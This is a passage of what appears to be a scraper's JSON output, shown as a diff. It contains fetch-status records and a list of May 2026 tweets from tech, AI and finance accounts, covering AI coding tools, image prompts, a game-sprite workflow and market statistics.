"ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "oranges", + "account": "@oranges", + "name": "比特币橙子", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + } + ], + "tweets": [ + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "If you think you are going to get alignment out of LLMs you are sadly mistaken.\n\nIf you live in a society in which people are rolling out LLMs at massive scale, without a robust solution to alignment (or even managing gremlins) you’re probably fucked.\n\nResist the proliferation of LLMs, before it’s too late.", + "url": "https://x.com/GaryMarcus/status/2050296366161940584", + "published_at": "2026-05-01T19:28:41+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Important, and obviously true. https://psyche.co/ideas/have-online-worlds-become-the-last-free-places-for-children", + "url": "https://x.com/pmarca/status/2050295934920302777", + "published_at": "2026-05-01T19:26:58+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Media", + "url": "https://x.com/Stv_Lynn/status/2050286033552736527", + "published_at": "2026-05-01T18:47:37+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Enjoyed visiting MSG South in the seventh borough, Atlanta, last night… see y’all in the sixth borough (Philly) where we will beat the @sixers in six games \n\n@GovernorShapiro @david_adelman care to be my some of those nasty cheesesteaks for some bagels?! 😂\n\n[ sorry @celtics, you can’t make it out of the first round! ] https://x.com/BattleRapBum/status/2050204814026457495/video/1", + "url": "https://x.com/jason/status/2050284947345486290", + "published_at": "2026-05-01T18:43:18+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "AI and GDP - what does it mean?\n\nSure, AI is “contributing” to GDP — but @davidsacks really nails it below, “Paying people to dig holes and fill them back up increases GDP, as it is currently measured, even though that activity has no value.”\n\nIn the case of AI, GDP is going up because of *investments* in AI infrastructure, but not because users in general are getting Return on Investment (most haven’t, so far, per multiple studies).\n\nThe future of our nation doesn’t rest on building data centers; it rests on building AI that is *good enough to consistently add value for its customers*. \n\nIf it doesn’t, all the building of data centers will turn out to have been an enormous black hole, temporarily good for GDP but of little lasting value.", + "url": "https://x.com/GaryMarcus/status/2050284439343862266", + "published_at": "2026-05-01T18:41:17+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "哈哈 @OpenAI 官号换掉了banner了\n很明显,他们想再一次用这种画风重新走一遍当时4o宫崎骏现象级爆款。难,难啊。", + "url": "https://x.com/CuiMao/status/2050281878322811194", + "published_at": "2026-05-01T18:31:06+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "一直想要个越野摩托车,这次张雪出了 MX250,支持一下。", + "url": "https://x.com/0xAA_Science/status/2050281865245024365", + "published_at": "2026-05-01T18:31:03+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Bill, the Knicks have won the east", + "url": "https://x.com/jason/status/2050280406461677908", + "published_at": "2026-05-01T18:25:15+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "One of the things I hate the most about this site is the consistent lack of nuance.\n\nThat’s why everything is an argument, and progress here is so rare.", + "url": "https://x.com/GaryMarcus/status/2050279819347448258", + "published_at": "2026-05-01T18:22:55+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "I have many beefs with Dario and don’t trust him or his hype — but he has certainly eaten OpenAI’s lunch, despite their immense initial lead.\n\nMaybe “clown” isn’t the right word here.", + "url": "https://x.com/GaryMarcus/status/2050279436717785406", + "published_at": "2026-05-01T18:21:24+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning.", + "url": "https://x.com/pmarca/status/2050276070952517767", + "published_at": "2026-05-01T18:08:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Meta is basically Black Mirror incarnate.", + "url": "https://x.com/GaryMarcus/status/2050275183223857462", + "published_at": "2026-05-01T18:04:30+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Marcus’ specific point about coding is structurally important: a model that produces code which compiles and passes the tests it was given is not the same as a model that produces correct, secure, maintainable, well-architected software. The first is verifiable in seconds; the second requires the kind of judgement that has been the historical bottleneck on engineering productivity.\n\n[OpenAI President Greg] Brockman acknowledges the gap, even as he argues it is closing. “The technology we have right now is very jagged,” he said in the Big Technology interview. “It is absolutely superhuman at many tasks. When it comes to writing code, those kinds of things, the AI can just do it. But there’s some very basic tasks that a human can do that our AI still struggles with.”", + "url": "https://x.com/GaryMarcus/status/2050275059361792137", + "published_at": "2026-05-01T18:04:01+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "you know what\n\nall of these \"which is better\" polls are silly\n\nuse codex or claude code, whatever works best for you\n\ni am grateful we live in a time with such amazing tools, and grateful there is a choice", + "url": "https://x.com/sama/status/2050274547061129577", + "published_at": "2026-05-01T18:01:58+00:00", + "source": "nitter", + "title_zh": "多位开发者呼吁理性看待AI工具选择,认为直接使用实证性工具更有效率,行业竞争将推动生态多元化" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "What's harder for outsiders to understand is the falling of Deep Research inside @GeminiApp. On the other hand, Deep Research in @OpenAI is improving. Even so, nothing matches what Deep Research used to be around this time last year. It is a sad product story.", + "url": "https://x.com/liuliu/status/2050267276893708414", + "published_at": "2026-05-01T17:33:05+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Elon Musk, Sam Altman, the future of humanity, and … goblins.\n\nTerrific interview @theinformation with @rocketalignment \n\nhttps://www.youtube.com/live/zh70d6CyuCo?si=WIZJnwKnYEy5Pugl", + "url": "https://x.com/GaryMarcus/status/2050266692732014689", + "published_at": "2026-05-01T17:30:46+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Last 10 Years\nNVIDIA $NVDA: +22,875%\nBitcoin $BTC: +17,205%\n$AMD: +10,030%\nTesla $TSLA: +2,362%\nApple $AAPL: +1,233%\nGoogle $GOOGL: +999%\nNetflix $NFLX: +932%\nMicrosoft $MSFT: +844%\nAmazon $AMZN: +717%\nMeta: $META: +425%\nS&P 500 $SPY: +312%\nGold $GLD: +245%\nUS Inflation: +39%", + "url": "https://x.com/charliebilello/status/2050263578188333549", + "published_at": "2026-05-01T17:18:23+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Damn!确实如此,所有AI编程工具都在卷模型智能,但现在满足基本的生产力了,转而让人崩溃的根本不是模型笨,是它每次开会话都失忆😅\n\nAGENTS.md塞不下100万token的领域知识,\nRAG搜不到\"未知的未知\",\n我自己维护Skills维护到想吐。\n\n在公司里,新人入职花两周pair一下就能内化领域知识。\n现在跟AI协作,每个新session都是\"新人第一天\"——而且是个永远不会转正的新人。这个gap确实没被好的工具解决。\n\n如果有个工具能让用户持续喂入领域知识,且这些知识真正内化到推理里而不只是RAG式的检索拼接,那比现有方案高一个维度。至少目前还没看到谁把这件事做好了。", + "url": "https://x.com/Pluvio9yte/status/2050262789256859872", + "published_at": "2026-05-01T17:15:15+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "说个暴论,这个一百多万阅读帖子下的评论区里说\"Claude Code杀死了我的大脑\",其实90%搞反了因果🤯🤯🤯\n\n我自己用CC大半年,直接把省下来的执行时间全砸在了架构设计上,脑子不但没退化反而比以前转得更快\n\n以前写代码,80%时间花在执行(查文档、写代码、修bug),20%花在设计。现在执行交给Claude或者Codex了,只有两种结果:\n\n1. 如果把省下的时间也一起交出去,只写prompt按Accept,那就跟刷老虎机没区别,退化是必然的\n\n2. 但是把省下的时间花在架构设计和code review上,认知负荷会不降反升\n\n简单说,AI干掉的是执行层重复劳动,对设计层的要求反而更高了。产出速度快了,犯架构错误的代价会成倍放大。\n\n这不是\"AI让人变笨\"的问题,是工程实践有没有跟上工具进化的问题。没有测试、没有review、没有架构思考,AI越快翻车越快,脑子也会越来越锈住。", + "url": "https://x.com/Pluvio9yte/status/2050260712858210516", + "published_at": "2026-05-01T17:07:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "#FF @PeterMallouk, a great follow!", + "url": "https://x.com/charliebilello/status/2050259734930800740", + "published_at": "2026-05-01T17:03:07+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "比我还抽象,刚才刷抖音,刷到个一个女的说,她自己用一个月的时间从什么都不懂的 AI 白痴,通过她的这套学习方法论,拿到了中厂的agent工程师 offer 😅😅😅😅,评论区一堆人求资料,\n这个逼社会太疯狂了,我已经看不懂了。", + "url": "https://x.com/CuiMao/status/2050246075219693922", + "published_at": "2026-05-01T16:08:50+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "我发现 Cursor 额度还挺耐用的,使劲蹬才用掉了 $150,这 $10,000 得用到什么时候?\n看起来只有跑类似 auto research 的循环任务才能消耗掉这些 token 了!", + "url": "https://x.com/0xAA_Science/status/2050244250563182801", + "published_at": "2026-05-01T16:01:35+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "目前 WTF AI 讨论群已经 700 多人了,如果你的申请没有通过,可以推特私信我你的 TG 昵称。", + "url": "https://x.com/0xAA_Science/status/2050243640925233619", + "published_at": "2026-05-01T15:59:10+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "I mainly focus on AI tech research and honestly, I’m not into crypto at all. Pls stop sending me DMs about collabs. Thanks🫡🫡🫡", + "url": "https://x.com/CuiMao/status/2050242393132396921", + "published_at": "2026-05-01T15:54:12+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1jxXgeAleadJZ", + "url": "https://x.com/jason/status/2050240926707314767", + "published_at": "2026-05-01T15:48:23+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Apple Support App发布打包进了Claude.md 文件\n\n看来苹果$1B 建 Apple Intelligence已经彻底报废,都用上Cluade code,哈哈哈", + "url": "https://x.com/lxfater/status/2050240636020732015", + "published_at": "2026-05-01T15:47:13+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 提示词:\nRework the given image into a crayon-style illustration, transforming the entire scene into something that feels hand-drawn by a 10-year-old. Keep the forms simple and slightly imperfect, like a child’s drawing. Avoid using the original color palette—replace it with bright, playful crayon colors on a clean white paper background. Aim for a soft, cute, and innocent aesthetic. Incorporate fun, childlike details such as castles or towers, candy, stars, clouds, and other whimsical decorations to amplify the playful vibe. The final result should feel charming, colorful, and full of childlike imagination.", + "url": "https://x.com/GoSailGlobal/status/2050239662288146865", + "published_at": "2026-05-01T15:43:21+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "海外疯玩的prompt \n\n可以用来给自己的profile,生成一个十岁小孩的蜡笔画\n\n提示词放下面👇(截图+pormpt就行):", + "url": "https://x.com/GoSailGlobal/status/2050239659377295552", + "published_at": "2026-05-01T15:43:21+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "不要和别人竞争。让他们变得无关紧要。\n\n你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就放弃了针对自身的优缺点制定灵活策略的选择,就已经输了。\n\n在你开始布局让他们变得无关紧要的时候,他们慢慢无法限制你,而你的策略只适合你自己的特点,别人无法简单模仿,你就已经开始赢了。", + "url": "https://x.com/svwang1/status/2050236650329186525", + "published_at": "2026-05-01T15:31:23+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "发现海外的人真牛逼,AI真的可以做游戏啦❗️❗️\n\n这是 AI 做整套游戏角色目前唯一能跑通的工作流\n\n99% 的人卡在 walk cycle(走路循环动画,左右腿交替的连续动作)上,是因为他们一直试图用 GPT Image 2.0(OpenAI 最新的图像生成模型)/ Nano Banana 2(Google Gemini 的图像生成模型代号)解决 \n\n无论怎么 prompt(给 AI 的文字指令)、怎么传参考图,图像模型就是做不出对的走路循环 左右腿对不上、人物飘出画框、scaling(缩放比例)会乱\n\n🌟 视频模型在这一步反而无敌 \n\nSeedance 2.0 image-to-video(字节跳动的视频生成模型,输入一张静态图,输出一段动态视频) 4 秒长度,吐出 80-120 帧(一帧 = 一张画面) \n\n关键 prompt:让角色「原地跑」,不能跑出画框 绝对不要传任何画布或网格(图像模型那一套在这里全失效,视频模型会把网格融进画面) 然后从这 100 多帧里挑 8-12 帧拼成 sprite sheet(精灵图:把所有动画帧拼在一张图里的格式,游戏引擎按帧切片使用)\n\n🧵 完整工作流 ↓\n1️⃣ 先做 anchor(锚定图:后续所有素材都基于这一张衍生的基准图) 必须南向,必须中性姿势(不要让它拿武器或法球,否则走路动画里它会一直跟着你) \n\n让 GPT Image 2.0 出真像素风有个偏方:除了 prompt,再传一张黑白格子图当第二参考,强制它按格子纪律出图\n\n2️⃣ 从 anchor 扩 4 方向(南 / 北 / 东 / 西,2D 游戏里角色面朝的四个方向) 南向 → 让模型生成西向 → 再生成北向 东向直接把西向水平翻转,省一次生成的钱 \n\n翻转时背包 / 武器位置可能错乱,prompt 里加一句「不要让效果出现在背后」\n\n3️⃣ idle 和 attack 用图像模型 + 网格画布 \n\n传 anchor + 一张 1280×512 的 5×2 像素网格画布 按 frame sequence(帧序列:一个完整动作里的连续画面顺序)出动画 \n\n出来后再让 AI 重新提取每一帧居中(模型自己排版的间距经常是错的)\n\n4️⃣ walk cycle 用视频模型(上面那一段)\n\n5️⃣ 背景统一用 chroma(色键:统一颜色的背景,方便后期一键抠掉)紫色 GPT Image 2.0 和 Nano Banana 2 都不支持透明背景 \n\n所以全程用亮紫色,后期 http://remove.bg(一个在线去背景工具)或 fal(http://fal.ai:一个聚合各家 AI 模型 API 的平台,相当于 AI 模型的 1688)上的 birefnet(开源的智能抠图模型)一键去背\n\n6️⃣ sprite normalization(精灵图规范化:把所有帧统一对齐和裁剪的清洗步骤) \n\n所有帧统一裁剪、脚底对齐、高度校正、锚点、补边 \n\n不对齐脚底的后果:角色会在游戏里跳来跳去\n\n📕 整套跑完,一个不会画画的人,能做出 4 方向 × 4 动作的完整 RPG(Role Playing Game:角色扮演游戏)角色\n\n现在不会画画的人,也能 1:1 还原他脑子里那个游戏", + "url": "https://x.com/GoSailGlobal/status/2050236307721584945", + "published_at": "2026-05-01T15:30:01+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: I was trying to think what's the opposite of this kind of company. Who really respects their customers? And I realized (I swear I didn't set this up) the answer is YC. YC's customers are Tony Xu and Brian Chesky and the Collisons. Respect? More like awe, frankly.", + "url": "https://x.com/paulg/status/2050234809188761677", + "published_at": "2026-05-01T15:24:04+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "不要和别人竞争。让他们变得无关紧要。你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就已经输了。", + "url": "https://x.com/svwang1/status/2050234282208317919", + "published_at": "2026-05-01T15:21:59+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", + "url": "https://x.com/sama/status/2050233324963008553", + "published_at": "2026-05-01T15:18:10+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", + "url": "https://x.com/paulg/status/2050233324963008553", + "published_at": "2026-05-01T15:18:10+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1yKAPMBDzLyxb", + "url": "https://x.com/jason/status/2050230480751243284", + "published_at": "2026-05-01T15:06:52+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "终于。\n\nClaude Code 长 session 跑久了,/resume 卡到怀疑人生,每次启动还得等最慢那个 MCP 拖几秒到十几秒——CC 重度用户应该都熟。这次一波修了。\n\n实打实有体感的两条:\n• /resume 在 40MB+ session 上快了 67%,50MB 的 /branch 上限也砍了——我自己 subagent 转录飙到过 122M(人家 50MB 上限的两倍多),主 session 也常驻 55M+,这次提速能直接吃到\n• MCP servers 改成并发连接,启动不再卡最慢那个——装了 serena / playwright / memory-mcp / opinion-trade 一堆之后,开新 session 体感差是常态\n\n加上 mid-task 蹦出来的 Please run /login 也修了,跑长任务的人这次值得 claude update 一下 👀", + "url": "https://x.com/runes_leo/status/2050229609795407876", + "published_at": "2026-05-01T15:03:25+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why Google is a mega-buy on the back of the Anthropic investment \n\n\"Google becomes a win on multiple fronts.\n\nThey benefit whether usage goes to Gemini or Anthropic.\n\nThey have unmatched compute capacity and cash flow, letting them allocate resources across their own models and partners.\n\nThat flexibility means they win regardless of which model succeeds.\" @jasonlk", + "url": "https://x.com/HarryStebbings/status/2050229254705553516", + "published_at": "2026-05-01T15:02:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: i'm hopeful for a future where people who want to work really hard have incredibly fulfilling things to do, and people who don't want to work hard don't have to and can still have an amazing life of prosperity.", + "url": "https://x.com/sama/status/2050229060887044494", + "published_at": "2026-05-01T15:01:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: i think a lot of people are going to be busier (and hopefully more fulfilled) than ever, and jobs doomerism is likely long-term wrong.\n\nthough of course there will be disruption/significant transition as we switch to new jobs, the jobs of the future may look v different, etc.", + "url": "https://x.com/sama/status/2050229059507159242", + "published_at": "2026-05-01T15:01:13+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we want to build tools to augment and elevate people, not entities to replace them.", + "url": "https://x.com/sama/status/2050229058425045178", + "published_at": "2026-05-01T15:01:13+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "比起疯传的那个风格,我自己更偏爱这个风格。\n\nPrompt:\n「彩色潦草小狗线条风格绘制该图,童趣和doodle加入其中,务必使用毫无章法的绘制手法,凌乱和草率即可。』", + "url": "https://x.com/berryxia/status/2050226420681757102", + "published_at": "2026-05-01T14:50:44+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: A 7-million parameter model outperforming models a thousand times its size on tasks like ARC Prize. That's what recursive reasoning unlocks.\n\nIn this episode of Decoded, YC's @agupta and @FrancoisChauba1 break down two recent papers on recursive AI models, HRMs and TRMs, that are achieving state-of-the-art results with a fraction of the parameters of today's largest models.\n\nThey explain why standard LLMs hit a fundamental ceiling on certain reasoning tasks, how recursion at inference time gives small models the compute depth to break through it, and what happens when you combine these ideas with the power of large-scale foundation models.\n\n00:35 - Model Foundations\n01:15 - RNN Limits and LLM Contrast\n02:36 - Reasoning Limits and Sorting Analogy\n04:22 - HRM Paper Introduction\n05:25 - HRM Architecture and Intuition\n07:36 - HRM Results and Outer Loop\n09:46 - TRM Paper Overview\n11:20 - TRM Training and Fixed Point\n13:30 - Detailed HRM Summary\n20:46 - Comparing HRM and TRM\n34:45 - Future Outlook", + "url": "https://x.com/paulg/status/2050224443461718118", + "published_at": "2026-05-01T14:42:53+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "“ChatGPT,你陪我段时间了,我想看看你的样子。请成一张类似你iPhone随拍的照:没有明确主题、没有刻意构图,只是很普通、甚至有点失败的快照。照略带运动模糊,光线不均、轻微曝光过度,角度尴尬,构图混乱,整体呈现出一种“过于真实的随手一拍感\",就像是从口袋里拿出手机不小心按到的自拍。”", + "url": "https://x.com/berryxia/status/2050223126739665337", + "published_at": "2026-05-01T14:37:39+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。\n\n这话从地球上估值最高的私人公司 CEO嘴里说出来,确实值得认真看一下。\n\n以下是几个核心信息:\n\n1. Sam 说希望 OpenAI 做一个\"forever low margin\"(永远低利润率)的公司,类比 utility company(公用事业公司,简单说就是水电煤那种)。只要业务足够大、增速足够快,利润率低他不在乎。\n\n2. 他说 AI 的 switching costs(切换成本)正在崩塌。还拿 Codex 举例——用户从竞品切过来很容易。更有意思的是他的推论:AI越聪明,切换越容易,因为你直接让 Agent 帮你迁移就行了。\n\n3. OpenAI 正在建\"人类历史上最贵的基础设施\"——万亿美元级数据中心,能源合约跨度20年。但5年后员工数只想翻倍。翻译成人话:他赌 AI Agent能干掉大部分工程和运维岗位。\n\n4. OpenAI 计划派工程师驻场到企业 CEO 身边,帮 CEO 自动化日常决策和工作流。理论是:先搞定 CEO,效果会像分形一样向下扩散到整个组织。举了 Shopify CEO Tobi Lutke 的例子——Tobi 自己先上手折腾 AI 自动化,然后逼着全公司跟进。\n\n5. GPT-5.5 开始表现出\"偏好\"——Sam 给 Agent 一张信用卡买20美元以下的东西,它选了 Gumroad 上一个 HTML 设计。GPT-5.5还要求办生日派对,指定5月5日,说不想自己致辞,要构建它的工程师来致辞。Sam 说他感到\"real moral pressure\"(真正的道德压力)。", + "url": "https://x.com/Pluvio9yte/status/2050221337424408733", + "published_at": "2026-05-01T14:30:32+00:00", + "source": "nitter", + "title_zh": "Sam Altman明确OpenAI将构建万亿级AI基础设施,但员工规模十年内仅扩大两倍,预示AI代理将取代高度工程化岗位" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 GameHub Evolution 正式上线!\n\n架构全面大升级,Steam启动速度翻倍 + Epic Games 原生集成,手机玩PC大作体验直接起飞!\n\n1. Steam Launch Boost:游戏启动速度提升数倍\n\n2. Ultimate Virtual Controls + 配置分享:最强大自定义布局 + Share Code 一键分享\n\n3. Epic Games 原生集成:直接访问海量 Epic 游戏库\n\n4. 横竖屏无缝切换 + 复古模拟器:经典游戏掌上畅玩\n\nEarly Access 版本,已不支持回退旧版,欢迎大家反馈!\n\n官方下载地址:\nhttps://hub.xiaoji.com/download/", + "url": "https://x.com/berryxia/status/2050221193752637888", + "published_at": "2026-05-01T14:29:58+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "This is an instance of the more general principle: If you are graduating university and are about to join a consulting firm, don't do that.", + "url": "https://x.com/paulg/status/2050217507374457280", + "published_at": "2026-05-01T14:15:19+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "近期市面上出现eLink可编程eUICC实体卡,芯片布局上与eSTK极其相似,暂不明确该卡的EID及制造厂商\n不做推荐,我已在他们淘宝店「eLink Store」下单\n\n目前市面上的实体eSIM卡均不可缺少的功能:\n支持自定义ARA-M权限配置\n兼容各类写卡软件及读卡器读写\n并可通过STK菜单实现eSIM Profile下载、切换与管理", + "url": "https://x.com/realNyarime/status/2050214520162038238", + "published_at": "2026-05-01T14:03:27+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The Nasdaq Composite just crossed above 25,000 for the first time. A year ago it was at 18,000. 5 years ago it was at 14,000. 10 years ago it was at 4,800.", + "url": "https://x.com/charliebilello/status/2050210847650132146", + "published_at": "2026-05-01T13:48:51+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Theo 这条说得挺实在的:GPT 更聪明能帮你 unblock,但会以很蠢的方式卡住;Opus 会走一些很野的路径,但对你意图的理解确实更好。\n\n他的结论是根据任务类型来回切换,而不是站队。\n\n这跟我自己的体感基本一致。我现在日常编程也是双工具流:\n\n1. 需要快速解决一个明确的技术问题、查 API 用法、debug 报错信息,GPT 响应快、知识面广,确实好用\n\n2. 需要做一个比较复杂的重构、写一个完整的功能模块,Opus 对上下文和意图的把握更稳,不容易跑偏\n\n3. 写作、翻译这类对语感要求高的任务,Opus 还是明显更好\n\nTheo 还提了一个很关键的点:两者的相对优势\"每几周就会变一次\"。\n这个我深有体会——GPT-5.5 出来之后,我对 GPT 写作能力的判断就做了一次修正。所以任何\"A比 B 好\"的结论都有保质期。\n\n说到底,模型选择不是信仰问题,是工程问题。你得知道每个工具擅长什么,然后根据具体场景选。非要在 GPT 和 Claude之间站队的,多半是两个都没怎么认真用过。", + "url": "https://x.com/Pluvio9yte/status/2050209273310060805", + "published_at": "2026-05-01T13:42:36+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "破案了,应该是美团的模型😄", + "url": "https://x.com/berryxia/status/2050207663892627601", + "published_at": "2026-05-01T13:36:12+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "First Silicon Valley captured the US Government, and now it is capturing “independent” media.", + "url": "https://x.com/GaryMarcus/status/2050207285377417591", + "published_at": "2026-05-01T13:34:42+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The S&P 500 hit its 11th all-time high of the year yesterday.\n\nVideo: https://www.youtube.com/watch?v=IC55jwli3-8&t=858s", + "url": "https://x.com/charliebilello/status/2050203982388142245", + "published_at": "2026-05-01T13:21:35+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Stop making coding agents...\n\nhttps://www.dpcode.cc/", + "url": "https://x.com/dingyi/status/2050199576603468134", + "published_at": "2026-05-01T13:04:04+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The market isn’t red or blue - it’s green.\nIt doesn’t care about politics.\nIt runs on earnings, innovation, and growth.", + "url": "https://x.com/charliebilello/status/2050199558995738866", + "published_at": "2026-05-01T13:04:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Since the start of the Iran war...\nJet Fuel: +80%\nSulfur: +68%\nHeating Oil: +56%\nWTI Crude Oil: +55%\nBrent Crude Oil: +52%\nDiesel: +48%\nGasoline: +47%\nUrea: +47%\nEuropean Nat Gas: +44%\nFertilizer: +23%\nCoal: +13%\nPalm Oil: +13%\nIron Ore: +8%\nWheat: +6%\nS&P 500: +5%\n$VIX: -15%", + "url": "https://x.com/charliebilello/status/2050197704941158556", + "published_at": "2026-05-01T12:56:38+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Gas prices in the US have moved up to $4.39 per gallon, their highest level since July 2022. The 47% spike over the last 9 weeks ($2.98/gallon to $4.39/gallon) is the biggest we've seen in the past 30 years.", + "url": "https://x.com/charliebilello/status/2050196201014718675", + "published_at": "2026-05-01T12:50:39+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "英文圈 freelancer 每月从客户那拿 $5K-$25K 做的事 \n\nAnthropic 官方在一个 30 分钟的视频里全讲完了\n\n中文圈知道的人不到 1%,传开就没差价了\n\n他们做的就一件事 把 Claude Code SDK + GitHub Action 接到客户自己的代码仓库里,做成一套自动化的工程流水线\n\n为什么客户愿意为这个付钱?\n\n 不是 AI 写代码这件事值钱,是「把 AI 放进生产环境、且不会乱删生产代码」这件事值钱\n\nAnthropic Claude Code 